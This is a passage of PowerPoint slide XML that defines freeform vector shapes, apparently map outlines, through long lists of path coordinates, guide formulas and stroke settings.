                    <a:lnTo>
                      <a:pt x="315" y="291"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="306" y="290"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="302" y="288"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="297" y="285"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="290" y="281"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="285" y="279"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="276"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="266" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="261" y="271"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="253" y="267"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="249" y="265"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="241" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="239" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="235" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="230" y="256"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="217" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="213" y="248"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="209" y="243"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="206" y="240"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="198" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="234"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="190" y="230"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="185" y="222"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="183" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="187" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188" y="214"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188" y="213"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="205"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="202"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188" y="198"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="183" y="191"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="185" y="187"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="165" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="155" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="146" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="166"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="171"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="175"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="175"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="166"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="159"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="155" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="191" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="192" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="208" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="218" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="222" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="224" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="229" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="234" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="237" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="241" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="245" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="250" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="253" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="256" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="261" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="266" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="272" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="277" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="282" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="284" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="287" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="293" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="300" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="302" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="305" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="307" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="313" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="316" y="124"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36194" name="Freeform 327"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="9" y="1304"/>
                <a:ext cx="1668" cy="1334"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 300 w 1668"/>
                  <a:gd name="T1" fmla="*/ 524 h 1334"/>
                  <a:gd name="T2" fmla="*/ 627 w 1668"/>
                  <a:gd name="T3" fmla="*/ 544 h 1334"/>
                  <a:gd name="T4" fmla="*/ 578 w 1668"/>
                  <a:gd name="T5" fmla="*/ 493 h 1334"/>
                  <a:gd name="T6" fmla="*/ 494 w 1668"/>
                  <a:gd name="T7" fmla="*/ 451 h 1334"/>
                  <a:gd name="T8" fmla="*/ 379 w 1668"/>
                  <a:gd name="T9" fmla="*/ 409 h 1334"/>
                  <a:gd name="T10" fmla="*/ 322 w 1668"/>
                  <a:gd name="T11" fmla="*/ 446 h 1334"/>
                  <a:gd name="T12" fmla="*/ 300 w 1668"/>
                  <a:gd name="T13" fmla="*/ 453 h 1334"/>
                  <a:gd name="T14" fmla="*/ 239 w 1668"/>
                  <a:gd name="T15" fmla="*/ 538 h 1334"/>
                  <a:gd name="T16" fmla="*/ 228 w 1668"/>
                  <a:gd name="T17" fmla="*/ 518 h 1334"/>
                  <a:gd name="T18" fmla="*/ 178 w 1668"/>
                  <a:gd name="T19" fmla="*/ 479 h 1334"/>
                  <a:gd name="T20" fmla="*/ 134 w 1668"/>
                  <a:gd name="T21" fmla="*/ 425 h 1334"/>
                  <a:gd name="T22" fmla="*/ 128 w 1668"/>
                  <a:gd name="T23" fmla="*/ 338 h 1334"/>
                  <a:gd name="T24" fmla="*/ 130 w 1668"/>
                  <a:gd name="T25" fmla="*/ 288 h 1334"/>
                  <a:gd name="T26" fmla="*/ 121 w 1668"/>
                  <a:gd name="T27" fmla="*/ 211 h 1334"/>
                  <a:gd name="T28" fmla="*/ 131 w 1668"/>
                  <a:gd name="T29" fmla="*/ 176 h 1334"/>
                  <a:gd name="T30" fmla="*/ 193 w 1668"/>
                  <a:gd name="T31" fmla="*/ 36 h 1334"/>
                  <a:gd name="T32" fmla="*/ 308 w 1668"/>
                  <a:gd name="T33" fmla="*/ 26 h 1334"/>
                  <a:gd name="T34" fmla="*/ 493 w 1668"/>
                  <a:gd name="T35" fmla="*/ 191 h 1334"/>
                  <a:gd name="T36" fmla="*/ 589 w 1668"/>
                  <a:gd name="T37" fmla="*/ 465 h 1334"/>
                  <a:gd name="T38" fmla="*/ 251 w 1668"/>
                  <a:gd name="T39" fmla="*/ 1306 h 1334"/>
                  <a:gd name="T40" fmla="*/ 868 w 1668"/>
                  <a:gd name="T41" fmla="*/ 1084 h 1334"/>
                  <a:gd name="T42" fmla="*/ 815 w 1668"/>
                  <a:gd name="T43" fmla="*/ 1054 h 1334"/>
                  <a:gd name="T44" fmla="*/ 795 w 1668"/>
                  <a:gd name="T45" fmla="*/ 1008 h 1334"/>
                  <a:gd name="T46" fmla="*/ 786 w 1668"/>
                  <a:gd name="T47" fmla="*/ 985 h 1334"/>
                  <a:gd name="T48" fmla="*/ 759 w 1668"/>
                  <a:gd name="T49" fmla="*/ 907 h 1334"/>
                  <a:gd name="T50" fmla="*/ 766 w 1668"/>
                  <a:gd name="T51" fmla="*/ 811 h 1334"/>
                  <a:gd name="T52" fmla="*/ 777 w 1668"/>
                  <a:gd name="T53" fmla="*/ 767 h 1334"/>
                  <a:gd name="T54" fmla="*/ 903 w 1668"/>
                  <a:gd name="T55" fmla="*/ 745 h 1334"/>
                  <a:gd name="T56" fmla="*/ 1234 w 1668"/>
                  <a:gd name="T57" fmla="*/ 747 h 1334"/>
                  <a:gd name="T58" fmla="*/ 1300 w 1668"/>
                  <a:gd name="T59" fmla="*/ 771 h 1334"/>
                  <a:gd name="T60" fmla="*/ 1422 w 1668"/>
                  <a:gd name="T61" fmla="*/ 888 h 1334"/>
                  <a:gd name="T62" fmla="*/ 1493 w 1668"/>
                  <a:gd name="T63" fmla="*/ 870 h 1334"/>
                  <a:gd name="T64" fmla="*/ 1640 w 1668"/>
                  <a:gd name="T65" fmla="*/ 788 h 1334"/>
                  <a:gd name="T66" fmla="*/ 1658 w 1668"/>
                  <a:gd name="T67" fmla="*/ 849 h 1334"/>
                  <a:gd name="T68" fmla="*/ 1624 w 1668"/>
                  <a:gd name="T69" fmla="*/ 865 h 1334"/>
                  <a:gd name="T70" fmla="*/ 1611 w 1668"/>
                  <a:gd name="T71" fmla="*/ 906 h 1334"/>
                  <a:gd name="T72" fmla="*/ 1600 w 1668"/>
                  <a:gd name="T73" fmla="*/ 912 h 1334"/>
                  <a:gd name="T74" fmla="*/ 1551 w 1668"/>
                  <a:gd name="T75" fmla="*/ 956 h 1334"/>
                  <a:gd name="T76" fmla="*/ 1539 w 1668"/>
                  <a:gd name="T77" fmla="*/ 978 h 1334"/>
                  <a:gd name="T78" fmla="*/ 1527 w 1668"/>
                  <a:gd name="T79" fmla="*/ 982 h 1334"/>
                  <a:gd name="T80" fmla="*/ 1520 w 1668"/>
                  <a:gd name="T81" fmla="*/ 964 h 1334"/>
                  <a:gd name="T82" fmla="*/ 1514 w 1668"/>
                  <a:gd name="T83" fmla="*/ 975 h 1334"/>
                  <a:gd name="T84" fmla="*/ 1519 w 1668"/>
                  <a:gd name="T85" fmla="*/ 993 h 1334"/>
                  <a:gd name="T86" fmla="*/ 1511 w 1668"/>
                  <a:gd name="T87" fmla="*/ 1001 h 1334"/>
                  <a:gd name="T88" fmla="*/ 1527 w 1668"/>
                  <a:gd name="T89" fmla="*/ 1025 h 1334"/>
                  <a:gd name="T90" fmla="*/ 1523 w 1668"/>
                  <a:gd name="T91" fmla="*/ 1030 h 1334"/>
                  <a:gd name="T92" fmla="*/ 1510 w 1668"/>
                  <a:gd name="T93" fmla="*/ 1038 h 1334"/>
                  <a:gd name="T94" fmla="*/ 1493 w 1668"/>
                  <a:gd name="T95" fmla="*/ 1068 h 1334"/>
                  <a:gd name="T96" fmla="*/ 1459 w 1668"/>
                  <a:gd name="T97" fmla="*/ 1194 h 1334"/>
                  <a:gd name="T98" fmla="*/ 1427 w 1668"/>
                  <a:gd name="T99" fmla="*/ 1198 h 1334"/>
                  <a:gd name="T100" fmla="*/ 1374 w 1668"/>
                  <a:gd name="T101" fmla="*/ 1146 h 1334"/>
                  <a:gd name="T102" fmla="*/ 1295 w 1668"/>
                  <a:gd name="T103" fmla="*/ 1139 h 1334"/>
                  <a:gd name="T104" fmla="*/ 1299 w 1668"/>
                  <a:gd name="T105" fmla="*/ 1157 h 1334"/>
                  <a:gd name="T106" fmla="*/ 1213 w 1668"/>
                  <a:gd name="T107" fmla="*/ 1163 h 1334"/>
                  <a:gd name="T108" fmla="*/ 1173 w 1668"/>
                  <a:gd name="T109" fmla="*/ 1213 h 1334"/>
                  <a:gd name="T110" fmla="*/ 1089 w 1668"/>
                  <a:gd name="T111" fmla="*/ 1159 h 1334"/>
                  <a:gd name="T112" fmla="*/ 920 w 1668"/>
                  <a:gd name="T113" fmla="*/ 1099 h 1334"/>
                  <a:gd name="T114" fmla="*/ 592 w 1668"/>
                  <a:gd name="T115" fmla="*/ 541 h 1334"/>
                  <a:gd name="T116" fmla="*/ 583 w 1668"/>
                  <a:gd name="T117" fmla="*/ 503 h 1334"/>
                  <a:gd name="T118" fmla="*/ 254 w 1668"/>
                  <a:gd name="T119" fmla="*/ 1325 h 1334"/>
                  <a:gd name="T120" fmla="*/ 56 w 1668"/>
                  <a:gd name="T121" fmla="*/ 638 h 1334"/>
                  <a:gd name="T122" fmla="*/ 121 w 1668"/>
                  <a:gd name="T123" fmla="*/ 609 h 1334"/>
                  <a:gd name="T124" fmla="*/ 156 w 1668"/>
                  <a:gd name="T125" fmla="*/ 578 h 1334"/>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668"/>
                  <a:gd name="T190" fmla="*/ 0 h 1334"/>
                  <a:gd name="T191" fmla="*/ 1668 w 1668"/>
                  <a:gd name="T192" fmla="*/ 1334 h 1334"/>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668" h="1334">
                    <a:moveTo>
                      <a:pt x="299" y="525"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="298" y="528"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="295" y="534"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="292" y="536"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="288" y="537"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="284" y="536"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="277" y="531"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="276" y="529"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="277" y="525"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="281" y="521"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="284" y="517"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="522"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="291" y="523"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="520"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="296" y="517"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="296" y="512"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="300" y="511"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="307" y="513"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="311" y="517"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="312" y="520"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="307" y="521"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="304" y="521"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="300" y="524"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="299" y="525"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="667" y="584"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="666" y="589"/>
                    </a:lnTo>
